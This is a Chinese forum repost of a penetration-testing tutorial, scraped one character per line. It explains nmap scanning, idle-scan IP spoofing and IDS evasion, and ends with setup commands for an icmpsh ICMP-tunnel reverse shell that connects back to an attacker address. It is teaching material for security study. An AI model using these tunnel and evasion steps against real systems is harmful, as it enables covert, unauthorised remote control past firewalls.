论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
工具
[17133] 2021-08-10_渗透测试战技101之nmap与icmp隧道
文档创建者:
s7ckTeam
浏览次数:
8
最后更新:
2025-01-18
工具
8 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-54
6万
主题
-6万
回帖
-54
积分
管理员
积分
-54
发消息
2021-08-10_渗透测试战技101之nmap与icmp隧道
渗
透
测
试
战
技
1
0
1
之
n
m
a
p
与
i
c
m
p
隧
道
s
e
c
8
7
5
F
r
e
e
B
u
f
2
0
2
1
-
0
8
-
1
0
知
识
触
发
战
技
,
战
技
刻
意
练
习
得
到
经
验
,
经
验
反
思
源
头
,
得
到
创
新
力
。
我
们
需
要
模
仿
与
练
习
。
—
—
-
s
e
c
8
7
5
n
m
a
p
比
战
技
更
重
要
的
是
源
头
的
查
阅
,
此
意
识
可
以
让
大
脑
保
持
在
舒
适
区
且
命
中
根
源
。
为
什
么
这
件
事
情
很
重
要
?
w
h
y
?
因
为
您
无
法
保
证
自
己
学
到
的
东
西
永
远
都
用
于
工
作
,
它
会
健
忘
掉
。
提
前
说
明
提
前
说
明
:
官
方
手
册
,
m
a
n
手
册
,
帮
助
命
令
等
都
是
用
于
辅
佐
,
不
存
在
谁
比
谁
权
威
、
全
。
请
自
己
思
考
并
取
舍
。
并
放
弃
一
劳
永
逸
的
想
法
。
请
确
保
能
找
到
官
方
手
册
和
利
用
m
a
n
n
m
a
p
。
h
t
t
p
s
:
/
/
n
m
a
p
.
o
r
g
/
找
到
找
到
n
m
a
p
功
能
性
参
数
功
能
性
参
数
还
是
还
是
记
住
开
关
的
记
住
开
关
的
f
l
a
g
?
?
主
机
发
现
主
机
发
现
基
于
I
C
M
P
的
主
机
发
现
还
是
端
口
响
应
包
的
预
期
值
主
机
发
现
?
不
,
还
能
将
意
识
提
升
到
基
于
S
Y
N
和
A
C
K
几
个
步
骤
中
的
具
体
发
哪
一
种
包
,
刻
意
的
改
包
和
重
放
来
主
机
发
现
。
【
注
意
】
:
这
里
不
会
引
申
出
更
丰
富
的
网
络
包
修
改
,
重
放
与
基
线
防
御
配
置
。
因
为
它
们
于
我
的
工
作
量
过
于
巨
大
。
您
知
道
,
寻
找
这
一
处
容
易
,
但
此
文
章
一
旦
开
头
就
得
所
有
。
因
此
,
我
将
给
出
地
方
,
防
御
配
置
不
在
这
里
讨
论
与
观
察
:
h
t
t
p
s
:
/
/
w
w
w
.
s
c
a
p
r
e
p
o
.
c
o
m
/
C
C
E
编
号
为
国
际
防
御
配
置
基
准
线
。
尽
力
了
,
师
傅
们
。
举
一
个
例
子
,
足
以
说
明
这
种
战
技
的
观
察
力
与
创
造
力
,
使
用
-
s
P
发
送
p
i
n
g
扫
描
。
它
发
送
了
什
么
网
络
包
?
我
以
后
使
用
网
络
包
修
改
与
重
放
修
改
哪
里
?
哪
些
预
期
结
果
可
以
确
认
主
机
的
存
活
?
1
2
9
为
k
a
l
i
机
器
。
因
为
提
前
读
过
文
档
,
知
道
它
会
发
一
个
I
C
M
P
e
c
h
o
的
请
求
包
与
T
C
P
8
0
(
r
o
o
t
特
权
)
请
求
包
用
于
探
测
。
得
到
的
主
机
存
活
响
应
包
也
回
复
了
一
个
I
C
M
P
e
c
h
o
响
应
包
并
且
回
复
了
一
个
T
C
P
8
0
R
S
T
响
应
包
。
所
以
,
我
们
知
道
此
主
机
确
实
是
在
的
。
不
妨
思
考
一
下
,
I
C
M
P
的
t
y
p
e
8
类
型
(
以
及
其
他
协
议
字
段
值
?
R
F
C
文
档
看
看
哪
些
处
于
实
验
期
?
)
修
改
成
别
的
?
T
C
P
8
0
端
口
改
改
?
这
就
是
为
什
么
,
会
存
在
其
他
方
式
与
参
数
来
尝
试
性
的
看
看
响
应
,
设
备
会
不
会
出
现
意
外
的
响
应
包
?
或
者
意
外
的
情
况
?
端
口
扫
描
基
础
端
口
扫
描
基
础
o
p
e
n
(
开
放
的
)
,
c
l
o
s
e
d
(
关
闭
的
)
,
f
i
l
t
e
r
e
d
(
被
过
滤
的
)
,
u
n
f
i
l
t
e
r
e
d
(
未
被
过
滤
的
)
,
o
p
e
n
|
f
i
l
t
e
r
e
d
(
开
放
或
者
被
过
滤
的
)
,
或
者
c
l
o
s
e
d
|
f
i
l
t
e
r
e
d
(
关
闭
或
者
被
过
滤
的
)
n
m
a
p
的
信
息
细
节
颗
粒
度
更
多
。
它
的
意
识
提
升
到
了
,
很
多
复
杂
情
况
性
的
思
考
,
不
同
响
应
包
的
情
况
。
我
们
需
要
掌
握
此
处
,
用
于
以
后
进
阶
其
他
技
术
材
料
。
该
端
口
接
收
T
C
P
连
接
或
者
U
D
P
报
文
,
说
明
它
正
在
工
作
,
那
么
主
机
自
然
是
存
活
的
。
o
p
e
n
(
开
放
的
开
放
的
)
因
为
没
有
应
用
程
序
在
其
端
口
上
监
听
,
因
此
状
态
是
c
l
o
s
e
d
(
关
闭
的
关
闭
的
)
,
这
种
影
响
可
能
是
丢
包
,
抖
动
或
者
暂
时
性
的
不
监
听
。
所
以
,
值
得
再
扫
描
一
下
,
可
能
一
些
又
开
放
了
。
-
s
L
(
列
表
扫
描
)
,
-
s
P
(
P
i
n
g
扫
描
)
,
-
P
0
(
无
p
i
n
g
)
,
-
P
S
[
p
o
r
t
l
i
s
t
]
(
T
C
P
S
Y
N
P
i
n
g
)
,
-
P
A
[
p
o
r
t
l
i
s
t
]
(
T
C
P
A
C
K
P
i
n
g
)
,
-
P
U
[
p
o
r
t
l
i
s
t
]
(
U
D
P
P
i
n
g
)
,
-
P
E
;
-
P
P
;
-
P
M
(
I
C
M
P
P
i
n
g
T
y
p
e
s
)
,
-
P
R
(
A
R
P
f
i
l
t
e
r
e
d
(
被
过
滤
的
被
过
滤
的
)
:
包
阻
塞
器
或
者
防
火
墙
会
丢
弃
包
,
或
者
响
应
I
C
M
P
错
误
消
息
如
类
型
3
代
码
1
3
(
无
法
到
达
目
标
:
通
信
被
管
理
员
禁
止
)
。
n
m
a
p
会
多
次
尝
试
,
使
得
扫
描
速
度
明
显
变
慢
。
基
于
这
种
慢
于
快
的
基
准
,
也
能
帮
助
我
们
识
别
是
否
存
在
阻
塞
与
防
火
墙
。
u
n
f
i
l
t
e
r
e
d
(
未
被
过
滤
的
未
被
过
滤
的
)
:
端
口
可
访
问
,
但
N
m
a
p
不
能
确
定
它
是
开
放
还
是
关
闭
。
发
送
A
C
K
请
求
包
的
探
测
才
会
被
分
类
到
此
状
态
,
还
需
要
使
用
其
他
类
型
,
如
窗
口
扫
描
,
S
Y
N
扫
描
,
或
者
F
I
N
扫
描
来
扫
描
未
被
过
滤
的
端
口
,
进
一
步
确
认
端
口
是
否
开
放
。
o
p
e
n
|
f
i
l
t
e
r
e
d
(
开
放
或
者
被
过
滤
的
开
放
或
者
被
过
滤
的
)
:
无
法
确
定
端
口
是
开
放
还
是
被
过
滤
的
,
N
m
a
p
就
把
该
端
口
划
分
成
这
种
状
态
。
比
如
使
用
U
D
P
,
I
P
协
议
,
F
I
N
,
N
u
l
l
,
和
X
m
a
s
扫
描
时
,
没
有
响
应
包
回
来
。
这
对
于
U
D
P
也
许
是
开
放
的
,
但
也
可
能
被
防
火
墙
设
备
丢
弃
了
。
c
l
o
s
e
d
|
f
i
l
t
e
r
e
d
(
关
闭
或
者
被
过
滤
的
关
闭
或
者
被
过
滤
的
)
:
注
意
m
a
n
手
册
与
官
方
文
档
中
的
一
些
差
异
性
。
I
d
l
e
扫
描
为
空
闲
态
扫
描
。
【
请
记
住
】
:
所
有
的
情
况
都
是
基
于
响
应
包
的
结
果
来
判
断
状
态
的
。
这
些
状
态
结
果
与
目
标
主
机
也
许
不
可
信
,
它
们
返
回
迷
惑
性
响
应
包
迷
惑
了
n
m
a
p
,
更
普
遍
的
是
非
R
F
C
兼
容
的
主
机
以
不
正
确
的
方
式
响
应
N
m
a
p
探
测
。
您
知
道
,
R
F
C
文
档
只
是
协
议
的
标
准
,
具
体
产
品
的
实
现
存
在
着
差
异
性
。
我
们
可
以
观
察
具
体
的
响
应
包
来
确
认
。
比
如
您
修
改
了
某
一
项
值
,
但
是
它
在
R
F
C
文
档
中
标
记
为
盲
区
,
响
应
包
返
回
错
误
,
或
者
不
支
持
该
值
。
那
么
机
会
就
来
,
它
确
实
存
在
但
是
仅
仅
是
不
支
持
而
已
?
想
想
与
类
比
b
u
r
p
s
u
t
i
e
的
抓
包
与
重
放
,
都
是
一
个
道
理
与
观
察
得
到
的
。
端
口
扫
描
技
术
端
口
扫
描
技
术
一
个
很
好
的
例
子
是
-
s
W
(
T
C
P
窗
口
扫
描
)
,
它
的
请
求
包
篡
改
了
不
同
系
统
对
于
T
C
P
窗
口
值
的
值
不
同
,
响
应
包
返
回
了
窗
口
的
大
小
还
是
0
。
基
于
这
个
例
子
,
可
以
把
大
家
带
入
到
就
和
b
u
r
p
s
u
t
i
e
的
使
用
一
样
,
就
是
修
改
值
然
后
观
察
不
同
的
响
应
包
情
况
来
判
断
,
有
或
者
没
有
。
这
不
过
这
里
把
b
u
r
p
s
u
t
i
e
换
一
个
网
络
包
的
修
改
与
重
放
工
具
罢
了
。
思
维
同
源
。
其
他
开
关
自
行
阅
读
文
档
。
T
C
P
I
P
I
D
I
d
l
e
空
闲
态
扫
描
空
闲
态
扫
描
(
-
s
I
)
互
联
网
上
的
每
个
I
P
包
都
有
一
个
片
段
身
份
号
码
(
I
P
I
D
)
。
由
于
许
多
操
作
系
统
只
是
为
他
们
发
送
的
每
个
数
据
包
增
加
这
个
数
字
,
探
测
I
P
I
D
可
以
告
诉
攻
击
者
已
经
发
送
了
多
少
数
据
包
自
上
次
探
测
。
这
种
侧
信
道
攻
击
技
巧
,
源
于
一
种
思
考
,
我
把
源
I
P
地
址
改
改
,
别
人
不
就
不
清
楚
我
是
谁
呢
?
改
成
它
们
信
任
的
I
P
地
址
?
入
侵
检
测
系
统
(
I
D
S
)
的
记
录
将
全
都
是
错
的
。
不
要
说
什
么
看
不
懂
和
还
没
有
成
熟
。
一
个
T
C
P
包
中
的
I
P
I
D
到
底
在
哪
里
?
它
有
那
么
难
找
吗
?
它
在
什
么
工
具
中
?
观
察
一
下
I
P
I
D
服
务
和
版
本
探
测
服
务
和
版
本
探
测
当
端
口
探
测
结
束
后
,
版
本
探
测
会
继
续
询
问
这
些
端
口
,
确
定
到
底
什
么
服
务
正
在
运
行
。
/
u
s
r
/
s
h
a
r
e
/
n
m
a
p
/
在
n
m
a
p
文
件
夹
中
基
于
n
m
a
p
-
s
e
r
v
i
c
e
s
数
据
库
的
匹
配
结
果
,
给
出
具
体
的
端
口
服
务
,
比
如
2
2
端
口
为
什
么
是
S
S
H
?
它
又
是
怎
么
识
别
版
本
的
?
基
于
n
m
a
p
-
s
e
r
v
i
c
e
-
p
r
o
b
e
s
数
据
库
的
匹
配
表
达
式
。
那
它
把
s
s
h
的
2
2
端
口
改
成
非
默
认
的
不
行
吗
?
这
就
是
为
什
么
再
加
上
一
个
版
本
探
测
进
来
的
原
因
。
我
都
匹
配
到
了
你
S
S
H
版
本
的
信
息
了
,
还
不
能
确
认
你
是
S
S
H
服
务
吗
?
您
想
给
n
m
a
p
做
贡
献
吗
?
这
绝
对
是
一
件
有
意
义
的
事
情
。
操
作
系
统
探
测
操
作
系
统
探
测
N
m
a
p
脚
本
引
擎
脚
本
引
擎
(
N
S
E
)
关
于
脚
本
的
使
用
,
需
要
注
意
到
文
件
名
的
分
类
性
,
还
有
安
全
或
者
不
安
全
的
脚
本
分
类
。
在
基
于
了
解
情
况
的
使
用
脚
本
是
一
种
很
好
的
意
识
思
维
。
不
要
让
一
切
都
失
控
。
时
间
和
性
能
时
间
和
性
能
有
人
说
n
m
a
p
很
慢
,
那
么
这
里
的
开
关
可
以
与
其
他
工
具
的
速
度
比
一
比
防
火
墙
防
火
墙
/
I
D
S
b
y
p
a
s
s
与
欺
骗
与
欺
骗
要
清
楚
的
是
,
这
里
也
能
伪
装
一
些
元
数
据
信
息
。
当
然
,
这
里
的
方
法
已
经
众
所
周
知
,
需
要
基
于
这
里
的
思
维
,
寻
找
和
测
试
其
他
的
攻
击
向
量
。
或
者
说
是
其
他
角
度
的
键
与
值
。
到
了
这
里
,
您
应
该
对
官
方
文
档
和
m
a
n
手
册
有
一
个
很
好
的
熟
悉
度
。
I
C
M
P
反
向
反
向
s
h
e
l
l
n
e
t
c
a
t
常
用
于
渗
透
测
试
中
的
g
e
t
s
h
e
l
l
工
具
之
一
。
还
有
很
多
流
行
的
s
h
e
l
l
文
件
,
R
e
v
e
r
s
e
T
C
P
M
e
t
e
r
p
r
e
t
e
r
、
C
9
9
P
H
P
w
e
b
s
h
e
l
l
、
J
S
P
w
e
b
s
h
e
l
l
等
这
里
就
不
讲
n
e
t
c
a
t
s
h
e
l
l
了
,
因
为
m
a
n
n
e
t
c
a
t
解
决
一
切
问
题
。
观
察
与
翻
译
一
下
说
明
,
马
上
就
能
明
白
功
能
项
开
关
的
意
思
。
这
里
聊
聊
一
种
场
景
。
进
出
服
务
器
的
通
信
受
到
防
火
墙
的
保
护
和
过
滤
,
并
且
不
允
许
在
任
何
侦
听
端
口
上
进
行
T
C
P
s
h
e
l
l
通
信
。
那
么
基
于
T
C
P
的
绑
定
s
h
e
l
l
与
反
向
s
h
e
l
l
自
然
就
不
成
立
了
。
但
是
许
多
环
境
又
允
许
发
送
和
接
收
p
i
n
g
请
求
,
用
于
故
障
诊
断
的
需
求
。
P
i
n
g
请
求
于
I
C
M
P
协
议
中
。
我
们
知
道
I
C
M
P
的
d
a
t
a
字
段
,
请
求
包
是
什
么
值
,
响
应
包
就
返
回
什
么
值
回
来
。
如
果
不
一
致
则
说
明
确
实
存
在
故
障
了
。
h
t
t
p
s
:
/
/
g
i
t
h
u
b
.
c
o
m
/
i
n
t
e
r
f
e
r
e
n
c
e
-
s
e
c
u
r
i
t
y
/
i
c
m
p
s
h
搭
建
i
c
m
p
隧
道
服
务
器
i
c
m
p
s
h
_
m
.
p
y
用
于
服
务
器
C
语
言
编
译
或
者
e
x
e
用
于
客
户
端
安
装
M
i
n
g
W
与
编
译
C
文
件
也
可
以
都
从
这
里
下
载
服
务
器
端
部
署
,
客
户
端
运
行
e
x
e
提
示
,
需
要
安
装
I
m
p
a
c
k
e
t
依
赖
-
I
参
数
,
忽
略
已
安
装
的
包
,
重
新
安
装
。
注
意
脚
本
的
相
对
路
径
放
置
的
位
置
。
观
察
源
码
发
现
调
用
了
i
m
p
a
c
k
e
t
包
中
的
很
多
A
P
I
接
口
函
数
,
它
本
身
不
会
自
动
定
位
与
寻
找
,
不
存
在
U
R
L
,
绝
对
路
径
或
者
相
对
路
径
的
机
制
来
帮
助
它
定
位
A
P
I
函
数
的
调
用
。
因
此
您
不
能
将
脚
本
随
便
放
置
,
不
然
会
出
现
一
些
误
导
性
质
的
报
错
。
i
6
8
6
-
w
6
4
-
m
i
n
g
w
3
2
-
g
c
c
i
c
m
p
-
s
l
a
v
e
-
c
o
m
p
l
e
t
e
.
c
-
o
i
c
m
p
-
s
l
a
v
e
-
c
o
m
p
l
e
t
e
.
e
x
e
s
y
s
c
t
l
-
w
n
e
t
.
i
p
v
4
.
i
c
m
p
_
e
c
h
o
_
i
g
n
o
r
e
_
a
l
l
=
1
>
/
d
e
v
/
n
u
l
l
.
/
i
c
m
p
s
h
_
m
.
p
y
<
a
t
t
a
c
k
e
r
_
i
p
>
<
t
a
r
g
e
t
_
i
p
>
m
a
n
p
i
p
p
i
p
i
n
s
t
a
l
l
i
m
p
a
c
k
e
t
-
I
发
送
命
令
观
察
I
C
M
P
隧
道
k
a
i
l
下
发
的
命
令
i
p
c
o
n
f
i
g
客
户
端
返
回
的
结
果
。
种
种
迹
象
表
白
,
d
a
t
a
字
段
被
用
于
C
2
隧
道
。
请
求
与
响
应
在
d
a
t
a
中
完
全
的
不
一
致
。
h
t
t
p
s
:
/
/
w
w
w
.
m
o
o
n
s
e
c
.
c
o
m
/
a
r
c
h
i
v
e
s
/
3
0
6
6
这
里
有
一
篇
文
章
提
及
到
报
错
信
息
。
但
是
本
质
上
还
是
路
径
问
题
。
精
彩
推
荐
精
彩
推
荐
阅
读
原
文
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
工具